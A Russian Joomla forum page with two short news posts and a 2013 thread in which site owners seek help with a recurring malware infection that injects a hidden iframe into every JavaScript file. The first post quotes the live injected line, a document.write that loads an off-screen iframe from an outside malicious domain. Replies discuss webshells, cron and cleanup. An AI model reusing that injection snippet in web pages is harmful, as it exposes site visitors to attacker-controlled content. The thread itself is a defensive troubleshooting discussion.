Новости Joomla

👩‍💻 События плагинов и порядок их срабатывания при работе с пользовательскими полями Joomla и использовании FieldsHelper.

👩‍💻 События плагинов и порядок их срабатывания при работе с пользовательскими полями Joomla и использовании FieldsHelper.

В процессе работы с Joomla бывает необходимо работать с пользовательским интерфейсом более тонко, чем обычно. Все формы Joomla состоят из стандартных полей, содержанием, стилем отображения, состоянием (включено/выключено, доступно для редактирования или нет и т.д.) можно управлять с помощью плагинов. Да и для нестандартных проектов хорошей практикой является создание одного системного или нескольких плагинов групп "под проект", в которых храниться весь "нестандарт".

В этой статье описаны все триггеры, которые вызываются через Event Dispatcher из administrator/components/com_fields/src/Helper/FieldsHelper.php, с привязкой к жизненному циклу (порядку этапов работы запроса), аргументам, изменяемым данным и дальнейшему распространению по Joomla. Это поможет вам работать с Joomla свободнее и не опасаясь при этом потерять изменения при очередном обновлении движка.

Подходы, описанные в статье, полезны в тех случаях, когда вы работаете с данными в com_fields - механизме создания и редактирования пользовательских полей ядра Joomla и при использовании FieldsHelper. Многие сторонние компоненты не используют эту возможность, поэтому данная статья будет полезна лишь частично.

Читать статью на Хабре.

@joomlafeed

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в  премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

• 34 Ответов
  • 10553 Просмотров
*

andpuxa

• Захожу иногда
  • 158
  • 4 / 5
  • Делаю сайты. Старательно и ответственно.
Подскажите пожалуйста куда можно смотреть или как это исправить?
После выкладывания сайта в сеть на всех его страницах стали появляться ссылки такого вида:
Код
document.write('<iframe src="http://rnsxuud.mrslove.com/62e7c59045a9a74d.VaTbW9HdJ4g?default" name="Geranel" height="102" width="102" style="left:-500px;top:0px;position:fixed;"></iframe>');
Что самое плохое, это не статическая ссылка, которую можно удалить, а действительно динамическая. Ссылка появляется 3-5 раза в день (точно поймать не могу) на 10-60 минут и потом бесследно исчезает.
Прописывается она ВО всех js файлах, а после истечении определённого времени БЕССЛЕДНО исчезает опять же со всех js файлов. Проверка компьютера на вирусы, смена несколько раз пароля на ftp и не сохранения его в ftp-клиентах, установка самых мощных компонентов защиты (OSE и Marqo) не помогает. Как появлялась ссылка, так и пропадает, даже с большим цинизмом, так как прикрепляется к внутренним js файлам OSE.

Да, ссылка не постоянная, онапереодически меняется, т.е. нет статики.

очень прошу помочь, готов отблагодарить финансово! Помогите! ! ! !
*

draff

• Гуру
  • 5801
  • 434 / 7
  • ищу работу
*

diggs

• Захожу иногда
  • 60
  • 4 / 0
Столкнулся с такой же проблемой. Правда ссылка не исчезает. Но то, что на сайте вирусная активность не видит никто и ничто из анти вирусного ПО. Тело айфрейма почти одно и то же, ссылки у нас с вами разные.
*

diggs

• Захожу иногда
  • 60
  • 4 / 0
Хотя нет, в 15:02 залили ссылку, в 16:45 по логам удалили.
*

Pavel M

• Захожу иногда
  • 103
  • 8 / 0
  • Учиться никогда не поздно
Уже были похожие темы. Юзайте поиск: http://joomlaforum.ru/index.php/topic,246899.0.html

Скорее всего, взломали через JCE - он в эти пару месяцев наделал шуму уже.
*

diggs

• Захожу иногда
  • 60
  • 4 / 0
И тему эту видел и поиск юзал и этот пост читал в первую очередь.
JCE - у меня не стоит, так что предположение ошибочно.
Попробовал стереть все компы, модули и плагины от nonumber.nl, посмотрим как это поменяет ситуацию.
*

winstrool

• Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
скарее всего автоматический скрипт гдето лежит, который работает с вашеми JS, а почему АВ не видет потомучто этих ссылок нет в его базе
*

diggs

• Захожу иногда
  • 60
  • 4 / 0
Так и есть, как можно вычислить его?
*

draff

• Гуру
  • 5801
  • 434 / 7
  • ищу работу
Так и есть, как можно вычислить его?
Посмотреть что запускается cron , если есть доступ.
*

winstrool

• Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
его не обезательно может запускать cron! может любой файл запускать в который он инклудиться или который на него ссылается!
*

andpuxa

• Захожу иногда
  • 158
  • 4 / 5
В общем я сначала подумал на хостера, что это он или какой нерадивый сотрудник подрабатывает. Сегодня весь день с ними переписывался нашли 4 шела, почистили, восстановили сайты, заново почистили и проверили. Шелов больше нет, но ссылки как шли так и остались. Причём, насколько я понял, показываются они всего несколько раз для одного IP и ссылки прописываюся на время... Т.е. помимо того, что ссылки прописываюся временно, так они ещё и подгружаются не всегда и не всем. Абсолютно гениальнейший человек написал (хоть и нехороший человек), - учёл все претензии поисковиков, такие ссылки и сайты поисковики не забанят.
Бороться с ними я так и не понял как... У меня на хостинге 8 сайтов, так эти ссылки вещаются везде... При переносе одного из них на другой хостинг, ссылки с него не идут... Видимо вот так и буду бороться удалив все сайты, а потом анализирую каждый. Что совсем плохо, так это то, что на все сайты с момента создания ставился OSE Antihacker и Marco SQL, логи мне приходили, но это видимо было вторжение сверх этих защит...
Моя вера в человечество разрушена  >:(
*

diggs

• Захожу иногда
  • 60
  • 4 / 0
Где у вас шелы нашли не сказали? Мне бы было интересно посмотреть на своих.
*

andpuxa

• Захожу иногда
  • 158
  • 4 / 5
Где у вас шелы нашли не сказали? Мне бы было интересно посмотреть на своих.
Все в tmp
*

WebDisaster

• Захожу иногда
  • 108
  • 12 / 0
в 15:02 залили ссылку, в 16:45 по логам удалили.
А логи этого действа (залили/удалили) увидеть можно?
*

draff

• Гуру
  • 5801
  • 434 / 7
  • ищу работу
его не обезательно может запускать cron! может любой файл запускать в который он инклудиться или который на него ссылается!
И как интересно, если наверняка время жизни процесса не больше 60сек.
*

andpuxa

• Захожу иногда
  • 158
  • 4 / 5
Кстати да, логи было бы интересно посмотреть.
Вот мои логи по всем сайтам:
Спойлер
[свернуть]
« Последнее редактирование: 21.02.2013, 22:31:08 от andpuxa »
*

andpuxa

• Захожу иногда
  • 158
  • 4 / 5
У меня cron чистый, точнее он не содержит более ничего, кроме моей собственной строки, которую я вносил очень давно...
*

WebDisaster

• Захожу иногда
  • 108
  • 12 / 0
Довольно просто. Вражеский файл инклудится, например, в index.php шаблона (или в корневой индекс) и вызывается при каждой загрузке каждой страницы. Внутри файла проверяется условие (например, текущее время больше х и меньше у) и в заданный промежуток времени выводится нужный iframe. Разумеется, возможна куча вариантов.
« Последнее редактирование: 22.02.2013, 05:12:16 от WebDisaster »
*

andpuxa

• Захожу иногда
  • 158
  • 4 / 5
Что самое интересное, на некоторых сайта (в разных папках) обноружил файлик time.txt с разным значением, где то 600, где то 30000. Сейчас выкачиваю все сайты и запущу поиск кто на него ссылается и кто его ещё содержит...
Файлик прикрепил, но там ничего особенного...

[вложение удалено Администратором]
« Последнее редактирование: 22.02.2013, 10:38:19 от andpuxa »
*

draff

• Гуру
  • 5801
  • 434 / 7
  • ищу работу
Довольно просто.
Ты о запуске процесса при вызове скрипта, а не о автоматическом запуске  скрипта прописанного в движок сайта.
Конечно скрипт вызывается при наступлении какого то события.
*

WebDisaster

• Захожу иногда
  • 108
  • 12 / 0
draff, я писал о том, что видимый эффект, идентичный описанному топикстартером, можно получить без cron'a: ссылка будет появляться на страницах и исчезать в заданное время, при этом в crontab будет чисто.
*

NightGuard

• Живу я здесь
  • 2927
  • 378 / 7
  • вжжж-вжжж
Никто не учитывает, что могли залить файла, крон может работать вообще на другом серваке, обращаться к вашему сайту, добавляя к адресу переменные по которым скрипт определяет что ему делать - добавлять или удалять iframe.
Идеология сверхпотребления более опасна для человечества, чем идеология гитлеровского тоталитаризма
*

winstrool

• Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Ну к примеру скрипт изначально прописан в одном файле, есть трафик, т.е человек заядящий на сайт автаматически актевирует скрипт, скрипт выполняет поставленую ему задачу->прописывает себя в другой файл->чистит себя в старом файле->чистит логи! а тут и цикл на каждый уник!
*

andpuxa

• Захожу иногда
  • 158
  • 4 / 5
После переноса 2 сайтов на другой хостинг простановка ссылок прекратилась, по крайней мере сегодня... Причём, как на перенесённых так и на оставшихся. Переносил вместе с переписыванием ты доменов, т.е. фактически полностью.
Да, ещё удалил пустые файлы от временных сайтов...
В общем, буду наблюдать...
*

capricorn

• Завсегдатай
  • 1949
  • 118 / 3
Шаблон, случайно, не от Yootheme?
*

capricorn

• Завсегдатай
  • 1949
  • 118 / 3
Вообще, может быть 1000 и 1 причина, почему это происходит. Объяснение одно - сайт хакнули. Вам следует, лучше всего, восстановить бэкап и следовать рекомендациям безопасности - никаких левых и малоизвестных компонентов, четкие права на папки и файлы - 755 и 644 на shared хостинге. В 99% сайт будет жить вечно. Почитайте здесь, если нет бэкапа.
http://www.exadomain.com/joomla-tutorials-and-guides/joomla-cms/48-joomla-iframe-hack-solution

Хакеры не глупые люди, но против них работают более умные люди над ядром Joomla. Порча сайта не обязательно вирус. Антивирус тут не при чем. Вы могли установить левый компонент или шаблон, а дальше зараза уже сама по своим алгоритмам начинает прописываться куда-хочет и делать, что хочет. Искать ее среди тысяч файлов - бессмыленно. Проще выжечь огнем все, восстановив бэкап.
« Последнее редактирование: 22.02.2013, 21:37:20 от capricorn »
*

andpuxa

• Захожу иногда
  • 158
  • 4 / 5
На некоторых сайтах купленные шаблоны yootheme. А какую это играет роль?
Права на всех папках 755, на файлах 644, на configuration 444.
Правильно ли я понимаю, что если скрипт запуска ссылок на сайте, то он по любому будет запускаться, даже если сайт я перенесу на другой хостинг (с тем же доменом). Просто после переноса уже 3 сайтов на другой хостинг как на них, так и на оставшихся скрипт не запускается, т.е. ссылки не проставляются... Получается проблема устранена...
Я правда удалил ещё кучу оставшихся от некоторых доменов папок с папками log и tmp, но не могли же они распространять ссылки...
*

winstrool

• Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
На некоторых сайтах купленные шаблоны yootheme. А какую это играет роль?
Права на всех папках 755, на файлах 644, на configuration 444.
Правильно ли я понимаю, что если скрипт запуска ссылок на сайте, то он по любому будет запускаться, даже если сайт я перенесу на другой хостинг (с тем же доменом). Просто после переноса уже 3 сайтов на другой хостинг как на них, так и на оставшихся скрипт не запускается, т.е. ссылки не проставляются... Получается проблема устранена...
Я правда удалил ещё кучу оставшихся от некоторых доменов папок с папками log и tmp, но не могли же они распространять ссылки...

Ждите когда хозяин этих ссылок заметит перенос сайта с одного хостинга на другой, т.е "отсутствие работоспособности его скриптов" и вновь полезит к вам через (если ставил минишелл) минишелл или вновь крутить уязвимый компонент... прежде чем выбирать хостера смотрите его на реверс, я бы сказал 50% хостеров под этой уязвимостью... а в дальнейшем обновите все свои компоненты, потому, что в основном, взлом Joomla происходит именно через КомпонентЫ!
*

andpuxa

• Захожу иногда
  • 158
  • 4 / 5
Но по сути, сайты как раз не пропадают. Я их переношу не просто на тестовый домен, а переношу с теми доменами под которыми сайт работал. по сути скрипт же должен продолжать выполняться...
А где можно получить полноценный реверс хостинга?
*

andpuxa

• Захожу иногда
  • 158
  • 4 / 5
Пока проблема не устранена, видимо была какая то передышка... Причём на перенесённых ссылок нет...
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться

Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 72496
Последний ответ 30.08.2023, 12:53:33
от SeBun
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5602
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
В файле index.php постоянно появляется вредоносный код

Автор Armal

Ответов: 29
Просмотров: 4834
Последний ответ 08.05.2021, 16:16:32
от gartes
На сайте появился вирус

Автор Lifar

Ответов: 3
Просмотров: 1528
Последний ответ 23.04.2021, 10:12:05
от ProtectYourSite
Регистрируются боты на сайте непрерывно.

Автор Stich SPb

Ответов: 27
Просмотров: 14543
Последний ответ 22.02.2021, 17:42:48
от soty20